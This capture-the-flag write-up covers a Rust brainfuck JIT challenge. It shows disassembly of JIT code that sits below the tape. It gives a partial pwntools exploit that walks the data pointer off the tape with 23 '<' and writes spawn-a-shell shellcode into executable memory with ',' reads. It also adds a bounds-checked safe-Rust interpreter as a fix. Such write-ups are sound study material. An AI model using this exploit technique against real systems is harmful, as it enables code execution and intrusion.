Tags: pwn brainfuck 

Rating: 5.0

You are given a Just-In-Time compiler written in Rust that executes brainfuck code.

A teammate found out that by moving the data pointer to the left with "**<**" you reach a function which looked like this:
```asm
sub rsp, 0x28
mov qword [rsp + 0x30], rcx
mov qword [rsp + 0x40], r8
mov qword [rsp + 0x48], r9
sub rsi, 0x68
cmp rsi, rdx
jae 0x38
add rsi, 0x8000
mov qword [rsp + 0x30], rdi
mov qword [rsp + 0x38], rsi
mov qword [rsp + 0x40], rdx
mov qword [rsp + 0x48], rcx
movabs rax, 0x56321e001b50
call rax
mov rdi, qword [rsp + 0x30]
mov rsi, qword [rsp + 0x38]
mov rdx, qword [rsp + 0x40]
mov rcx, qword [rsp + 0x48]
cmp al, 0
jne 0x80
mov rax, 0
add rsp, 0x28
mov rax, 1
add rsp, 0x28
```

The function can be overwritten with shellcode by reading input into it with "**,**", which is the equivalent of getchar() in C.
I do not overwrite the call because the shellcode will not be executed.
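The root cause here is a data pointer that can walk off the tape into memory the JIT itself executes. As an added example (not the challenge's JIT or its source), here is a brainfuck interpreter in safe Rust whose pointer moves are bounds-checked: the "**<**" at cell 0 becomes a PointerUnderflow error instead of a step into adjacent memory, and "**,**" can only ever land in a tape cell. The tape length, the error type and the function names are my own assumptions.

```rust
// Added example (not the challenge's JIT): brainfuck interpreter in safe Rust with a bounds-checked tape pointer.
#[derive(Debug, PartialEq)]
pub enum BfError {
    PointerUnderflow { at: usize },
    PointerOverflow { at: usize },
    UnmatchedBracket { at: usize },
}

pub fn run(program: &[u8], input: &[u8], tape_len: usize) -> Result<Vec<u8>, BfError> {
    let mut tape = vec![0u8; tape_len];
    let (mut ptr, mut pc, mut inp) = (0usize, 0usize, 0usize);
    let mut out = Vec::new();
    while pc < program.len() {
        match program[pc] {
            b'>' if ptr + 1 < tape_len => ptr += 1,
            b'>' => return Err(BfError::PointerOverflow { at: pc }),
            b'<' if ptr > 0 => ptr -= 1,
            // Cell 0 is the tape's edge; the JIT in the writeup let "<" keep going into its own code.
            b'<' => return Err(BfError::PointerUnderflow { at: pc }),
            b'+' => tape[ptr] = tape[ptr].wrapping_add(1),
            b'-' => tape[ptr] = tape[ptr].wrapping_sub(1),
            b'.' => out.push(tape[ptr]),
            // "," only ever lands in a tape cell (EOF reads as 0), never in code.
            b',' => { tape[ptr] = *input.get(inp).unwrap_or(&0); inp += 1; }
            b'[' if tape[ptr] == 0 => pc = matching(program, pc, 1)?,
            b']' if tape[ptr] != 0 => pc = matching(program, pc, -1)?,
            _ => {}
        }
        pc += 1;
    }
    Ok(out)
}

// Index of the bracket matching program[pc]; dir = 1 scans forward, -1 backward.
fn matching(program: &[u8], pc: usize, dir: isize) -> Result<usize, BfError> {
    let (open, close) = if dir == 1 { (b'[', b']') } else { (b']', b'[') };
    let (mut depth, mut i) = (0isize, pc as isize);
    while i >= 0 && (i as usize) < program.len() {
        let c = program[i as usize];
        depth += (c == open) as isize - (c == close) as isize;
        if depth == 0 { return Ok(i as usize); }
        i += dir;
    }
    Err(BfError::UnmatchedBracket { at: pc })
}

fn main() {
    // The writeup's 23 "<" from cell 0 is rejected at the very first step.
    println!("{:?}", run(&[b'<'; 23], b"", 30_000));
}
```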

Full Exploit:

```python
from pwn import *
from pwnlib import shellcraft

p = remote("challenges.tamuctf.com", 31337)
context.bits = 64
context.arch = "amd64"

shellcode = asm(shellcraft.amd64.linux.sh())

# 23 "<" moves the data pointer left, off the tape and onto the function shown above.
pay = b"<"*23
# each "," reads one byte of input into the current cell, ">" advances to the next one
for _ in range(len(shellcode)):
    pay += b",>"
```